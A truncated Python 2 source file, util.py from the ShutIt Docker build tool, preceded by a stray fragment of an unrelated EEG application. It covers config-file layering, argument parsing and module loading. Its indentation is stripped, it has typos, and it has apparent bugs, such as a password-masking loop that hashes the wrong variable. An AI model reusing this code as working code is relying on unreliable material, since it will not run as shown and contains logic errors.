bciDevice = InputManager.BCIDevice(settings.deviceName)
argcp = ''
glutInit(argcp, sys.argv)
niaEEGApp = NiaEEGApp()
niaEEGApp.MainLoop()
|
util.py | #!/usr/bin/env pythen
"""ShutIt utility functions.
"""
#The MIT License (MIT)
#
#Copyright (C) 2014 OpenBet Limited
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
#of the Software, and to permit persons to whom the Software is furnished to do
#so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#ITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
#THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import sys
import argparse
import os
import stat
from ConfigParser import RawConfigParser
import time
import re
import imp
import shutit_global
from shutit_module import ShutItModule
import pexpect
import socket
import textwrap
import json
import binascii
import base64
import subprocess
import getpass
import StringIO
import glob
import hashlib
import urlparse
import urllib2
import shutil
import manhole
from shutit_module import ShutItFailException
import operator
import threading
_default_cnf = '''
################################################################################
# Default core config file for ShutIt.
################################################################################
# Details relating to the target you are building to (container, ssh or bash)
[target]
# Root password for the target - replace with your chosen password
# If left blank, you will be prompted for a password
password:
# Hostname for the target - replace with your chosen target hostname
# (where applicable, eg docker container)
hostname:
force_repo_work:no
locale:en_US.UTF-8
# space separated list of ports to expose
# e.g. "ports:2222:22 8080:80" would expose container ports 22 and 80 as the
# host's 2222 and 8080 (where applicable)
ports:
# Name to give the docker container (where applicable).
# Empty means "let docker default a name".
name:
# Whether to remove the docker container when finished (where applicable).
rm:no
# Information specific to the host on which the build runs.
[host]
# Ask the user if they want shutit on their path
add_shutit_to_path: yes
# Folder with files you want to copy from in your build.
# Often a good idea to have a central folder for this per host
# in your /path/to/shutit/configs/`hostname`_`username`.cnf
# If set to blank, then defaults to /path/to/shutit/artifacts (preferred)
# If set to "artifacts", then defaults to the artifacts folder in the cwd.
artifacts_dir:
# Docker executable on your host machine
docker_executable:docker
# space separated list of dns servers to use
dns:
# Password for the username above on the host (only needed if sudo is needed)
password:
# Log file - will be set to 0600 perms, and defaults to /tmp/<YOUR_USERNAME>_shutit_log_<timestamp>
# A timestamp will be added to the end of the filename.
logfile:
# ShutIt paths to look up modules in separated by ":", eg /path1/here:/opt/path2/there
shutit_module_path:.
# Repository information
[repository]
# Whether to tag
tag:yes
# Whether to suffix the date to the tag
suffix_date:no
# Suffix format (default is epoch seconds (%s), but %Y%m%d_%H%M%S is an option if the length is ok with the index)
suffix_format:%s
# tag name
name:my_module
# Whether to tar up the docker image exported
export:no
# Whether to tar up the docker image saved
save:no
# Whether to push to the server
push:no
# User on registry to namespace repo - can be set to blank if not docker.io
user:
#Must be set if push is true/yes and user is not blank
password:YOUR_INDEX_PASSWORD_OR_BLANK
#Must be set if push is true/yes and user is not blank
email:YOUR_INDEX_EMAIL_OR_BLANK
# repository server
# make blank if you want this to be sent to the main docker index on docker.io
server:
# tag suffix, defaults to "latest", eg registry/username/repository:latest.
# empty is also "latest"
tag_name:latest
# Root setup script
# Each module should set these in a config
[shutit.tk.setup]
shutit.core.module.build:yes
# Modules may rely on the below settings, only change for debugging.
do_update:yes
[shutit.tk.conn_bash]
# None
[shutit.tk.conn_ssh]
# Required
ssh_host:
# All other configs are optional
ssh_port:
ssh_user:
password:
ssh_key:
# (what to execute on the target to get a root shell)
ssh_cmd:
# Aspects of build process
[build]
build_log:yes
# How to connect to target
conn_module:shutit.tk.conn_docker
# Run any docker container in privileged mode
privileged:no
# lxc-conf arg, eg
#lxc_conf:lxc.aa_profile=unconfined
lxc_conf:
# Base image can be over-ridden by --image_tag defaults to this.
base_image:ubuntu:14.04
# Whether to perform tests.
dotest:yes
# --net argument to docker, eg "bridge", "none", "container:<name|id>" or "host". Empty means use default (bridge).
net:
'''
class LayerConfigParser(RawConfigParser):
def __init__(self):
RawConfigParser.__init__(self)
self.layers = []
def read(self, filenames):
if type(filenames) is not list:
filenames = [filenames]
for filename in filenames:
cp = RawConfigParser()
cp.read(filename)
self.layers.append((cp, filename, None))
return RawConfigParser.read(self, filenames)
def readfp(self, fp, filename=None):
cp = RawConfigParser()
fp.seek(0)
cp.readfp(fp, filename)
self.layers.append((cp, filename, fp))
fp.seek(0)
ret = RawConfigParser.readfp(self, fp, filename)
return ret
def whereset(self, section, option):
for cp, filename, fp in reversed(self.layers):
if cp.has_option(section, option):
return filename
raise ShutItFailException('[%s]/%s was never set' % (section, option))
def get_config_set(self, section, option):
"""Returns a set with each value per config file in it.
"""
values = set()
for cp, filename, fp in self.layers:
if cp.has_option(section, option):
values.add(cp.get(section, option))
return values
def reload(self):
"""
Re-reads all layers again. In theory this should overwrite all the old
values with any newer ones.
It assumes we never delete a config item before reload.
"""
oldlayers = self.layers
self.layers = []
for cp, filename, fp in oldlayers:
if fp is None:
self.read(filename)
else:
self.readfp(fp, filename)
def remove_section(self, *args, **kwargs):
raise NotImplementedError('Layer config parsers aren\'t directly mutable')
def remove_option(self, *args, **kwargs):
raise NotImplementedError('Layer config parsers aren\'t directly mutable')
def set(self, *args, **kwargs):
raise NotImplementedError('Layer config parsers aren\'t directly mutable')
def is_file_secure(file_name):
"""Returns false if file is considered insecure, true if secure.
If file doesn't exist, it's considered secure!
"""
if not os.path.isfile(file_name):
return True
file_mode = os.stat(file_name).st_mode
if file_mode & (stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH):
return False
return True
def colour(code, msg):
"""Colourize the given string for a terminal.
"""
return '\033[%sm%s\033[0m' % (code, msg)
def get_configs(shutit, configs):
"""Reads config files in, checking their security first
(in case passwords/sensitive info is in them).
"""
cp = LayerConfigParser()
fail_str = ''
files = []
for config_file in configs:
if type(config_file) is tuple:
continue
if not is_file_secure(config_file):
fail_str = fail_str + '\nchmod 0600 ' + config_file
files.append(config_file)
if fail_str != '':
if shutit.cfg['build']['interactive'] > 0:
fail_str = 'Files are not secure, mode should be 0600. Running the following commands to correct:\n' + fail_str + '\n'
# Actually show this to the user before failing...
shutit.log(fail_str, force_stdout=True)
shutit.log('\n\nDo you want me to run this for you? (input y/n)\n', force_stdout=True)
if shutit.cfg['build']['interactive'] == 0 or util_raw_input(shutit=shutit,default='y') == 'y':
for f in files:
shutit.log('Correcting insecure file permissions on: ' + f, force_stdout=True)
os.chmod(f,0600)
# recurse
return get_configs(shutit, configs)
shutit.fail(fail_str)
for config in configs:
if type(config) is tuple:
cp.readfp(config[1], filename=config[0])
else:
cp.read(config)
# Treat allowed_images as a special, additive case
shutit.cfg['build']['shutit.core.module.allowed_images'] = cp.get_config_set('build', 'shutit.core.module.allowed_images')
return cp
def issue_warning(msg, wait):
"""Issues a warning to stderr.
"""
print >> sys.stderr, msg
time.sleep(wait)
# Manage config settings, returning a dict representing the settings
# that have been sanity-checked.
def get_base_config(cfg, cfg_parser):
"""Responsible for getting core configuration from config files.
"""
cfg['config_parser'] = cp = cfg_parser
# BEGIN Read from config files
cfg['build']['privileged'] = cp.getboolean('build', 'privileged')
cfg['build']['lxc_conf'] = cp.get('build', 'lxc_conf')
cfg['build']['build_log'] = cp.getboolean('build', 'build_log')
cfg['build']['base_image'] = cp.get('build', 'base_image')
cfg['build']['build_db_dir'] = '/root/shutit_build'
cfg['build']['dotest'] = cp.get('build', 'dotest')
cfg['build']['net'] = cp.get('build', 'net')
cfg['build']['completed'] = False
cfg['build']['step_through'] = False
cfg['build']['check_exit'] = True
# Take a command-line arg if given, else default.
if cfg['build']['conn_module'] == None:
cfg['build']['conn_module'] = cp.get('build', 'conn_module')
# Track logins in a stack and details in logins.
cfg['build']['login_stack'] = []
cfg['build']['logins'] = {}
# Whether to accept default configs
cfg['build']['accept_defaults'] = None
cfg['target']['password'] = cp.get('target', 'password')
cfg['target']['hostname'] = cp.get('target', 'hostname')
cfg['target']['force_repo_work'] = cp.getboolean('target', 'force_repo_work')
cfg['target']['locale'] = cp.get('target', 'locale')
cfg['target']['ports'] = cp.get('target', 'ports')
cfg['target']['name'] = cp.get('target', 'name')
cfg['target']['rm'] = cp.getboolean('target', 'rm')
cfg['target']['stty_cols'] = 320
# installed and removed cache
cfg['target']['modules_installed'] = [] # has been installed (in this build or previously)
cfg['target']['modules_not_installed'] = [] # modules _known_ not to be installed
cfg['target']['modules_ready'] = [] # has been checked for readiness and is ready (in this build)
# installed file info
cfg['target']['modules_recorded'] = []
cfg['target']['modules_recorded_cache_valid'] = False
# Directory to revert to when delivering in bash and reversion to context required.
cfg['target']['module_root_dir'] = '/'
cfg['host']['add_shutit_to_path'] = cp.getboolean('host', 'add_shutit_to_path')
cfg['host']['artifacts_dir'] = cp.get('host', 'artifacts_dir')
cfg['host']['docker_executable'] = cp.get('host', 'docker_executable')
cfg['host']['dns'] = cp.get('host', 'dns')
cfg['host']['password'] = cp.get('host', 'password')
cfg['host']['logfile'] = cp.get('host', 'logfile')
cfg['host']['shutit_module_path'] = cp.get('host', 'shutit_module_path').split(':')
cfg['repository']['name'] = cp.get('repository', 'name')
cfg['repository']['server'] = cp.get('repository', 'server')
cfg['repository']['push'] = cp.getboolean('repository', 'push')
cfg['repository']['tag'] = cp.getboolean('repository', 'tag')
cfg['repository']['export'] = cp.getboolean('repository', 'export')
cfg['repository']['save'] = cp.getboolean('repository', 'save')
cfg['repository']['suffix_date'] = cp.getboolean('repository', 'suffix_date')
cfg['repository']['suffix_format'] = cp.get('repository', 'suffix_format')
cfg['repository']['user'] = cp.get('repository', 'user')
cfg['repository']['password'] = cp.get('repository', 'password')
cfg['repository']['email'] = cp.get('repository', 'email')
cfg['repository']['tag_name'] = cp.get('repository', 'tag_name')
# END Read from config files
# BEGIN Standard expects
# It's important that these have '.*' in them at the start, so that the matched data is reliablly 'after' in the
# child object. Use these where possible to make things more consistent.
# Attempt to capture any starting prompt (when starting) with this regexp.
cfg['expect_prompts']['base_prompt'] = '\r\n.*[@#$] '
# END Standard expects
# BEGIN tidy configs up
if cfg['host']['artifacts_dir'] == 'artifacts':
cfg['host']['artifacts_dir'] = os.path.join(shutit_global.cwd, 'artifacts')
elif cfg['host']['artifacts_dir'] == '':
cfg['host']['artifacts_dir'] = os.path.join(shutit_global.shutit_main_dir, 'artifacts')
if cfg['host']['logfile'] == '':
logfile = os.path.join('/tmp/', 'shutit_log_' + cfg['build']['build_id'])
else:
logfile = logfile + '_' + cfg['build']['build_id']
cfg['host']['logfile'] = logfile
if cfg['build']['build_log']:
cfg['build']['build_log'] = open(logfile, 'a')
# Lock it down to the running user.
os.chmod(logfile,0600)
# delivery method bash and image_tag make no sense
if cfg['build']['delivery'] in ('bash','ssh'):
if cfg['target']['docker_image'] != '':
print('delivery method specified (' + cfg['build']['delivery'] + ') and image_tag argument make no sense')
sys.exit()
if cfg['target']['docker_image'] == '':
cfg['target']['docker_image'] = cfg['build']['base_image']
# END tidy configs up
# BEGIN warnings
# Warn if something appears not to have been overridden
warn = ''
#if cfg['target']['password'][:5] == 'YOUR_':
# warn = '# Found ' + cfg['target']['password'] + ' in your config, you may want to quit and override, eg put the following into your\n# ' + shutit_global.cwd + '/configs/' + socket.gethostname() + '_' + cfg['host']['real_user'] + '.cnf file (create if necessary):\n\n[target]\n#root password for the target host\npassword:mytargethostpassword\n\n'
# issue_warning(warn,2)
# FAILS begins
# rm is incompatible with repository actions
if cfg['target']['rm'] and (cfg['repository']['tag'] or cfg['repository']['push'] or cfg['repository']['save'] or cfg['repository']['export']):
print("Can't have [target]/rm and [repository]/(push/save/export) set to true")
sys.exit()
if warn != '' and cfg['build']['debug']:
issue_warning('Showing config as read in. This can also be done by calling with list_configs:',2)
shutit_global.shutit.log(print_config(cfg), force_stdout=True, code='31')
time.sleep(1)
if cfg['target']['hostname'] != '' and cfg['build']['net'] != '' and cfg['build']['net'] != 'bridge':
print('\n\ntarget/hostname or build/net configs must be blank\n\n')
sys.exit()
# FAILS ends
# Returns the config dict
def parse_args(shutit):
"""Responsible for parsing arguments.
TODO: precendence of configs documented
Environment variables:
SHUTIT_OPTIONS:
Loads command line options from the environment (if set).
Behaves like GREP_OPTIONS:
- space separated list of arguments
- backslash before a space escapes the space separation
- backslash before a backslash is interpreted as a single backslash
- all other backslashes are treated literally
eg ' a\ b c\\ \\d \\\e\' becomes '', 'a b', 'c\', '\d', '\\e\'
SHUTIT_OPTIONS is ignored if we are creating a skeleton
"""
cfg = shutit.cfg
cfg['host']['real_user_id'] = pexpect.run('id -u ' + cfg['host']['real_user']).strip()
# These are in order of their creation
actions = ['build', 'list_configs', 'list_modules', 'list_deps', 'serve', 'skeleton']
# COMPAT 2014-05-15 - build is the default if there is no action specified
# and we've not asked for help and we've called via 'shutit_main.py'
if len(sys.argv) == 1 or (len(sys.argv) > 1 and sys.argv[1] not in actions
and '-h' not in sys.argv and '--help' not in sys.argv
and os.path.basename(sys.argv[0]) == 'shutit_main.py'):
sys.argv.insert(1, 'build')
# Pexpect documentation says systems have issues with pauses < 0.05
def check_pause(value):
ivalue = float(value)
if ivalue < 0.05:
raise argparse.ArgumentTypeError(
"%s is an invalid pause (must be >= 0.05)" % value)
return ivalue
parser = argparse.ArgumentParser(description='ShutIt - a tool for managing complex Docker deployments.\n\nTo view help for a specific subcommand, type ./shutit <subcommand> -h',prog="ShutIt")
parser.add_argument('--version', action='version', version='%(prog)s 0.7')
subparsers = parser.add_subparsers(dest='action', help='''Action to perform - build=deploy to target, serve=run a shutit web server, skeleton=construct a skeleton module, list_configs=show configuration as read in, list_modules=show modules available, list_deps=show dep graph ready for graphviz. Defaults to 'build'.''')
sub_parsers = dict()
for action in actions:
sub_parsers[action] = subparsers.add_parser(action)
sub_parsers['skeleton'].add_argument('module_directory', help='Absolute path to new directory for module')
sub_parsers['skeleton'].add_argument('module_name', help='Name for your module. Single word and lower case, eg: mymysql')
sub_parsers['skeleton'].add_argument('domain', help='Arbitrary but unique domain for namespacing your module, eg com.mycorp')
sub_parsers['skeleton'].add_argument('--depends', help='Module id to depend on, default shutit.tk.setup (optional)', default='shutit.tk.setup')
sub_parsers['skeleton'].add_argument('--base_image', help='FROM image, default ubuntu:14.04 (optional)', default='ubuntu:14.04')
sub_parsers['skeleton'].add_argument('--script', help='Pre-existing shell script to integrate into module (optional)', nargs='?', default=None)
sub_parsers['skeleton'].add_argument('--example', help='Add an example implementation with model calls to ShutIt API (optional)', default=False, const=True, action='store_const')
sub_parsers['skeleton'].add_argument('-d', '--dockerfile', default=None)
sub_parsers['build'].add_argument('--export', help='Perform docker export to a tar file', const=True, default=False, action='store_const')
sub_parsers['build'].add_argument('--save', help='Perform docker save to a tar file', const=True, default=False, action='store_const')
sub_parsers['build'].add_argument('--push', help='Push to a repo', const=True, default=False, action='store_const')
sub_parsers['list_configs'].add_argument('--history', help='Show config with history', const=True, default=False, action='store_const')
sub_parsers['list_modules'].add_argument('--long', help='Show extended module info, including ordering', const=True, default=False, action='store_const')
sub_parsers['list_modules'].add_argument('--sort', help='Order the modules seen, default to module id', default='id', choices=('id','run_order'))
for action in ['build', 'serve', 'list_configs', 'list_modules', 'list_deps']:
sub_parsers[action].add_argument('--config', help='Config file for setup config. Must be with perms 0600. Multiple arguments allowed; config files considered in order.', default=[], action='append')
sub_parsers[action].add_argument('-d','--delivery', help='Delivery method, aka target. "docker" container (default), configured "ssh" connection, "bash" session', default=None, choices=('docker','target','ssh','bash'))
sub_parsers[action].add_argument('-s', '--set', help='Override a config item, e.g. "-s target rm no". Can be specified multiple times.', default=[], action='append', nargs=3, metavar=('SEC', 'KEY', 'VAL'))
sub_parsers[action].add_argument('--image_tag', help='Build container from specified image - if there is a symbolic reference, please use that, eg localhost.localdomain:5000/myref', default='')
sub_parsers[action].add_argument('--tag_modules', help='''Tag each module after it's successfully built regardless of the module config and based on the repository config.''', default=False, const=True, action='store_const')
sub_parsers[action].add_argument('-m', '--shutit_module_path', default=None, help='List of shutit module paths, separated by colons. ShutIt registers modules by running all .py files in these directories.')
sub_parsers[action].add_argument('--pause', help='Pause between commands to avoid race conditions.', default='0.05', type=check_pause)
sub_parsers[action].add_argument('--debug', help='Show debug.', default=False, const=True, action='store_const')
sub_parsers[action].add_argument('--trace', help='Trace function calls', const=True, default=False, action='store_const')
sub_parsers[action].add_argument('--interactive', help='Level of interactive. 0 = none, 1 = honour pause points and config prompting, 2 = query user on each module, 3 = tutorial mode', default='1')
sub_parsers[action].add_argument('--ignorestop', help='Ignore STOP files', const=True, default=False, action='store_const')
sub_parsers[action].add_argument('--ignoreimage', help='Ignore disallowed images', const=True, default=False, action='store_const')
sub_parsers[action].add_argument('--imageerrorok', help='Exit without error if allowed images fails (used for test scripts)', const=True, default=False, action='store_const')
sub_parsers[action].add_argument('--deps_only', help='build deps only, tag with suffix "_deps"', const=True, default=False, action='store_const')
args_list = sys.argv[1:]
if os.environ.get('SHUTIT_OPTIONS', None) and args_list[0] != 'skeleton':
env_args = os.environ['SHUTIT_OPTIONS'].strip()
# Split escaped backslashes
env_args_split = re.split(r'(\\\\)', env_args)
# Split non-escaped spaces
env_args_split = [re.split(r'(?<!\\)( )', item) for item in env_args_split]
# Flatten
env_args_split = [item for sublist in env_args_split for item in sublist]
# Split escaped spaces
env_args_split = [re.split(r'(\\ )', item) for item in env_args_split]
# Flatten
env_args_split = [item for sublist in env_args_split for item in sublist]
# Trim empty strings
env_args_split = [item for item in env_args_split if item != '']
# We know we don't have to deal with an empty env argument string
env_args_list = ['']
# Interpret all of the escape sequences
for item in env_args_split:
if item == ' ':
env_args_list.append('')
elif item == '\\ ':
env_args_list[-1] = env_args_list[-1] + ' '
elif item == '\\\\':
env_args_list[-1] = env_args_list[-1] + '\\'
else:
env_args_list[-1] = env_args_list[-1] + item
args_list[1:1] = env_args_list
args = parser.parse_args(args_list)
# What are we asking shutit to do?
cfg['action']['list_configs'] = args.action == 'list_configs'
cfg['action']['list_modules'] = args.action == 'list_modules'
cfg['action']['list_deps'] = args.action == 'list_deps'
cfg['action']['serve'] = args.action == 'serve'
cfg['action']['skeleton'] = args.action == 'skeleton'
cfg['action']['build'] = args.action == 'build'
# This mode is a bit special - it's the only one with different arguments
if cfg['action']['skeleton']:
if (args.dockerfile and (args.script or args.example)) or (args.example and args.script):
shutit_global.shutit.fail('Cannot have any two of script, -d/--dockerfile Dockerfile or --example as arguments')
cfg['skeleton'] = {
'path': args.module_directory,
'module_name': args.module_name,
'base_image': args.base_image,
'domain': args.domain,
'domainhash': str(get_hash(args.domain)),
'depends': args.depends,
'script': args.script,
'example': args.example,
'dockerfile': args.dockerfile
}
return
shutit_home = cfg['shutit_home'] = os.path.expanduser('~/.shutit')
# We're not creating a skeleton, so make sure we have the infrastructure
# in place for a user-level storage area
if not os.path.isdir(shutit_home):
os.mkdir(shutit_home, 0o700)
if not os.path.isfile(os.path.join(shutit_home, 'config')):
os.close(os.open(
os.path.join(shutit_home, 'config'),
os.O_WRONLY | os.O_CREAT,
0o600
))
# Default this to False as it's not always set (mostly for --debug calls).
cfg['list_configs']['cfghistory'] = False
cfg['list_modules']['long'] = False
cfg['list_modules']['sort'] = None
# Persistence-related arguments.
if cfg['action']['build']:
cfg['repository']['push'] = args.push
cfg['repository']['export'] = args.export
cfg['repository']['save'] = args.save
elif cfg['action']['list_configs']:
cfg['list_configs']['cfghistory'] = args.history
elif cfg['action']['list_modules']:
cfg['list_modules']['long'] = args.long
cfg['list_modules']['sort'] = args.sort
# What are we building on? Convert arg to conn_module we use.
if args.delivery == 'docker' or args.delivery == 'target':
cfg['build']['conn_module'] = 'shutit.tk.conn_docker'
cfg['build']['delivery'] = 'target'
elif args.delivery == 'ssh':
cfg['build']['conn_module'] = 'shutit.tk.conn_ssh'
cfg['build']['delivery'] = 'ssh'
elif args.delivery == 'bash':
cfg['build']['conn_module'] = 'shutit.tk.conn_bash'
cfg['build']['delivery'] = 'bash'
elif args.delivery == None:
cfg['build']['conn_module'] = None
cfg['build']['delivery'] = 'target'
# Get these early for this part of the build.
# These should never be config arguments, since they are needed before config is passed in.
if args.shutit_module_path is not None:
module_paths = args.shutit_module_path.split(':')
if '.' not in module_paths:
if cfg['build']['debug']:
shutit_global.shutit.log('Working directory path not included, adding...')
time.sleep(1)
module_paths.append('.')
args.set.append(('host', 'shutit_module_path', ':'.join(module_paths)))
cfg['build']['debug'] = args.debug
cfg['build']['trace'] = args.trace
cfg['build']['interactive'] = int(args.interactive)
cfg['build']['command_pause'] = float(args.pause)
cfg['build']['extra_configs'] = args.config
cfg['build']['config_overrides'] = args.set
cfg['build']['ignorestop'] = args.ignorestop
cfg['build']['ignoreimage'] = args.ignoreimage
cfg['build']['imageerrorok'] = args.imageerrorok
cfg['build']['tag_modules'] = args.tag_modules
cfg['build']['deps_only'] = args.deps_only
cfg['target']['docker_image'] = args.image_tag
# Finished parsing args.
# Sort out config path
if cfg['build']['interactive'] >= 3 or cfg['action']['list_configs'] or cfg['action']['list_modules'] or cfg['action']['list_deps'] or cfg['build']['debug']:
cfg['build']['log_config_path'] = '/tmp/shutit/config/' + cfg['build']['build_id']
if os.path.exists(cfg['build']['log_config_path']):
print(cfg['build']['log_config_path'] + ' exists. Please move and re-run.')
sys.exit()
os.makedirs(cfg['build']['log_config_path'])
# Tutorial stuff.
if cfg['build']['interactive'] >= 3:
print textwrap.dedent("""\
================================================================================
SHUTIT - INTRODUCTION
================================================================================
ShutIt is a script that allows the building of static target environments.
allowing a high degree of flexibility and easy conversion from other build
methods (eg bash scripts)
It is configured through command-line arguments (see --help) and .cnf files.
================================================================================
================================================================================
CONFIG
================================================================================
The config is read in the following order:
================================================================================
~/.shutit/config
- Host- and username-specific config for this host.
/path/to/this/shutit/module/configs/build.cnf
- Config specifying what should be built when this module is invoked.
/your/path/to/<configname>.cnf
- Passed-in config (via --config, see --help)
command-line overrides, eg -s com.mycorp.mymodule.module name value
================================================================================
Config items look like this:
[section]
name:value
or as command-line overrides:
-s section name value
================================================================================
""" + colour('31', '\n[Hit return to continue]'))
util_raw_input()
print textwrap.dedent("""\
================================================================================
MODULES
================================================================================
Each module (which is a .py file) has a lifecycle, "module_id" and "run_order".
The lifecycle (briefly) is as follows:
foreach module:
remove all modules config'd for removal
foreach module:
build
tag
stop all modules already started
do repository work configured
start all modules that were stopped
start
foreach module:
test module
stop all modules already started
foreach module:
finalize module
and these stages are run from the module code, returning True or False as
appropriate.
The module_id is a string that uniquely identifies the module.
The run_order is a float that defines the order in which the module should be
run relative to other modules. This guarantees a deterministic ordering of
the modules run.
See shutit_module.py for more detailed documentation on these.
================================================================================
""" + colour('31', '\n[Hit return to continue]'))
util_raw_input()
print textwrap.dedent("""\
================================================================================
PAUSE POINTS
================================================================================
Pause points can be placed within the build, which is useful for debugging.
This is used throughout this tutorial.
When debugging, pause_points will output your keyboard input before you finish.
This can help you build your build, as these commands can be pasted into the
module you are developing easily.
To escape a pause point when it happens, hit the "CTRL" and the "]"
key simultaneously.
================================================================================
""" + colour('31', '\n[Hit return to continue]'))
util_raw_input()
# Set up trace as fast as possible.
if shutit.cfg['build']['trace']:
def tracefunc(frame, event, arg, indent=[0]):
if event == "call":
shutit.log("-> call function: " + frame.f_code.co_name + " " + str(frame.f_code.co_varnames),force_stdout=True)
elif event == "return":
shutit.log("<- exit function: " + frame.f_code.co_name,force_stdout=True)
return tracefunc
sys.settrace(tracefunc)
def load_configs(shutit):
"""Responsible for loading config files into ShutIt.
Recurses down from configured shutit module paths.
"""
cfg = shutit.cfg
# Get root default config.
configs = [('defaults', StringIO.StringIO(_default_cnf))]
# Add the shutit global host- and user-specific config file.
configs.append(os.path.join(shutit.shutit_main_dir,
'configs/' + socket.gethostname() + '_' + cfg['host']['real_user'] + '.cnf'))
configs.append(os.path.join(cfg['shutit_home'], 'config'))
# Add the local build.cnf
configs.append('configs/build.cnf')
# Get passed-in config(s)
for config_file_name in cfg['build']['extra_configs']:
run_config_file = os.path.expanduser(config_file_name)
if not os.path.isfile(run_config_file):
print('Did not recognise ' + run_config_file +
' as a file - do you need to touch ' + run_config_file + '?')
sys.exit()
configs.append(run_config_file)
# Image to use to start off. The script should be idempotent, so running it
# on an already built image should be ok, and is advised to reduce diff space required.
if cfg['build']['interactive'] >= 3 or cfg['action']['list_configs'] or cfg['build']['debug']:
msg = ''
print textwrap.dedent("""\n""") + textwrap.dedent("""Looking at config files in the following order:""")
for c in configs:
if type(c) is tuple:
c = c[0]
msg = msg + ' \n' + c
shutit.log(' ' + c)
if cfg['build']['interactive'] >= 3:
print textwrap.dedent("""\n""") + msg + textwrap.dedent(colour('31', '\n\n[Hit return to continue]'))
util_raw_input(shutit=shutit)
if cfg['action']['list_configs'] or cfg['build']['debug']:
f = file(cfg['build']['log_config_path'] + '/config_file_order.txt','w')
f.write(msg)
f.close()
# Interpret any config overrides, write to a file and add them to the
# list of configs to be interpreted
if cfg['build']['config_overrides']:
# We don't need layers, this is a temporary configparser
override_cp = RawConfigParser()
for o_sec, o_key, o_val in cfg['build']['config_overrides']:
if not override_cp.has_section(o_sec):
override_cp.add_section(o_sec)
override_cp.set(o_sec, o_key, o_val)
override_fd = StringIO.StringIO()
override_cp.write(override_fd)
override_fd.seek(0)
configs.append(('overrides', override_fd))
cfg_parser = get_configs(shutit, configs)
get_base_config(cfg, cfg_parser)
if cfg['build']['debug']:
# Set up the manhole.
manhole.install(
verbose=True,
patch_fork=True,
activate_on=None,
oneshot_on=None,
sigmask=manhole.ALL_SIGNALS,
socket_path=None,
reinstall_delay=0.5,
locals=None
)
def load_shutit_modules(shutit):
"""Responsible for loading the shutit modules based on the configured module
paths.
"""
if shutit.cfg['build']['debug']:
shutit.log('ShutIt module paths now: ')
shutit.log(shutit.cfg['host']['shutit_module_path'])
time.sleep(1)
for shutit_module_path in shutit.cfg['host']['shutit_module_path']:
load_all_from_path(shutit, shutit_module_path)
def list_modules(shutit):
"""Display a list of loaded modules.
Config items:
- ['list_modules']['long']
If set, also print each module's run order value
- ['list_modules']['sort']
Select the column by which the list is ordered:
- id: sort the list by module id
- run_order: sort the list by module run order
The output is also saved to ['build']['log_config_path']/module_order.txt
Dependencies: texttable, operator
"""
# list of module ids and other details
# will also contain column headers
table_list = []
if shutit.cfg['list_modules']['long']:
# --long table: sort modules by run order
table_list.append(["Order","Module ID","Description","Run Order"])
else:
# "short" table ==> sort module by module_id
table_list.append(["Module ID","Description"])
if shutit.cfg['list_modules']['sort'] == 'run_order':
a = {}
for m in shutit.shutit_modules:
a.update({m.module_id:m.run_order})
# sort dict by run_order; see http://stackoverflow.com/questions/613183/sort-a-python-dictionary-by-value
b = sorted(a.items(), key=operator.itemgetter(1))
count = 0
# now b is a list of tuples (module_id, run_order)
for pair in b:
# module_id is the first item of the tuple
k = pair[0]
for m in shutit.shutit_modules:
if m.module_id == k:
count = count + 1
if shutit.cfg['list_modules']['long']:
table_list.append([str(count),m.module_id,m.description,str(m.run_order)])
else:
table_list.append([m.module_id,m.description])
elif shutit.cfg['list_modules']['sort'] == 'id':
a = []
for m in shutit.shutit_modules:
a.append(m.module_id)
a.sort()
count = 0
for k in a:
for m in shutit.shutit_modules:
if m.module_id == k:
count = count + 1
if shutit.cfg['list_modules']['long']:
table_list.append([str(count),m.module_id,m.description,str(m.run_order)])
else:
table_list.append([m.module_id,m.description])
# format table for display
import texttable
table = texttable.Texttable()
table.add_rows(table_list)
msg = table.draw()
print msg
f = file(shutit.cfg['build']['log_config_path'] + '/module_order.txt','w')
f.write(msg)
f.close()
def print_config(cfg, hide_password=True, history=False):
"""Returns a string representing the config of this ShutIt run.
"""
cp = cfg['config_parser']
s = ''
keys1 = cfg.keys()
if keys1:
keys1.sort()
for k in keys1:
if type(k) == str and type(cfg[k]) == dict:
s += '\n[' + k + ']\n'
keys2 = cfg[k].keys()
if keys2:
keys2.sort()
for k1 in keys2:
line = ''
line += k1 + ':'
# If we want to hide passwords, we do so using a sha512
# done an aritrary number of times (27).
if hide_password and (k1 == 'password' or k1 == 'passphrase'):
p = hashlib.sha512(cfg[k][k1]).hexdigest()
i = 27
while i > 0:
i = i - 1
p = hashlib.sha512(s).hexdigest()
line += p
else:
if type(cfg[k][k1] == bool):
line += str(cfg[k][k1])
elif type(cfg[k][k1] == str):
line += cfg[k][k1]
if history:
try:
line += (30-len(line)) * ' ' + ' # ' + cp.whereset(k, k1)
except:
# Assume this is because it was never set by a config parser.
line += (30-len(line)) * ' ' + ' # ' + "defaults in code"
s += line + '\n'
return s
def set_pexpect_child(key, child):
"""Set a pexpect child in the global dictionary by key.
"""
shutit_global.pexpect_children.update({key:child})
def get_pexpect_child(key):
"""Get a pexpect child in the global dictionary by key.
"""
return shutit_global.pexpect_children[key]
def load_all_from_path(shutit, path):
"""Dynamically imports files within the same directory (in the end, the path).
"""
#111: handle expanded paths
path = os.path.abspath(path)
#http://stackoverflow.com/questions/301134/dynamic-module-import-in-python
if os.path.abspath(path) == shutit.shutit_main_dir:
return
if not os.path.exists(path):
return
if os.path.exists(path + '/STOPBUILD') and not shutit.cfg['build']['ignorestop']:
